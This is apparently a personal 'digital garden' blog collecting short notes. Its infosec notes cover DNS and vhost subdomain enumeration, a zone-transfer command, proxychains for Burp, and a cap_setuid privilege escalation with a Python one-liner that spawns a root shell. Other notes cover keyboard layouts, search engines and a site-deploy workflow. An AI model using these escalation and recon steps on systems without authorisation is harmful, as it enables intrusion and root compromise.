dnsenum

Performs various dns-level and osint searches to find sub domains.

dnsenum \
  --enum target.tld \
  -f /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt

gobuster

You can do virtual host subdomain brute forcing with gobuster. You can specify the target as a hostname or ip.

gobuster vhost \
  -u http[s]://targetip[:port] \
  -f /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt \
  --append-domain

You can do a DNS zone transfer using dig by using axfr

dig axfr @dns-server.com target.tld

This will return all dns records for target.tld. It’s intended to copy all records from a primary to secondary server and should only happen if trusted, but misconfigured servers may allow unauthorised transfers allowing for enumeration without brute forcing 🌿 .

The seclists from https://github.com/danielmiessler/SecLists can be installed on Parrot using apt

apt install seclists

proxychains is a tool which forwards TCP traffic via a proxy. You run other applications via it. For example

proxychains curl www.example.com

The relevant part of config for HTTP traffic is in /etc/proxychains.conf

#socks4         127.0.0.1 9050 # comment this line out. TODO: Why?
# Add the following line
http 127.0.0.1 8080

This config forwards the traffic to a proxy on 8080 which is the default for burp. Change the setup as needed for other tools.

getcap is a program to get capabilities of others. The one which is a way in is cap_setuid

getcap -r / 2>/dev/null

If anything’s listed which lets you script, you can use that to get a shell. Here’s a Python example:

python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'

Just over a year ago I decided to bite the bullet and try out colemak. I’ve been at it full time on my Corne, by still using qwerty on traditional keyboards.

My findings:

• makes me a vim noob
• wpm has increased but plateaued because I want to retain qwerty memory
• what has been a success is Corne
• reflection: embrace qwerty and touch type on corne

Meta search

• Kagi premium (paid for and ad-free) search prioritising privacy and user experience. Reminiscent of the good-old-days
• SearXNG self-hostable, open-source metasearch engine that aggregates results from 200+ engines. There are hosted versions but privacy or veracity is not guaranteed

Specialist

• Virus Total meta engine for checking files and their hashes against virus databases
• Shodan is an engine to find devices connected to the internet
• Censys searches hosts, IPs, certificates

Exploits and CVE databases

• ExploitDB
• Rapid7
• Vulnerability Lab
• NIST NVD
• GTFOBins

T rexags

• infosec

After writing my notes on revamping the site 🌲 I’ve stumbled across the new idea of digital gardening as an alternative to blogging. It’s not actually that new, but it is to me.

What I like about it is how close it is to a Zettelkasten and how it allows for notes to be written and published in an unfinished state completely guilt-free. It reminds me of my first website all that time ago where there were pages which had nothing other than an under construction banner.

I thought I’d share my github action which deploys this site whenever a push a new file to main. It compiles the site with hugo and the rsyncs across to the server.

This means that my workflow is:

1. fire up neovim and write
2. commit and push
3. sit back and wait for the site to update

The code for the action is below. It requires a couple of secrets to be set up:

This is yet another variation of a blog by me, Clinton. I am a software engineer working and living in Bath, UK. The goal (this time) is to be somewhere between a blog and a zettelkasten where I’ll ramble, write some articles, but also share short facts, notes, and resources.

The content here is written by me (by which I mean, not AI.) I may use AI to help to plan articles but words will be my own. In fact, as an act of transparency, I’ll add Claude (or whatever) as a co-author and expressly note the input if I do use AI for anything anywhere.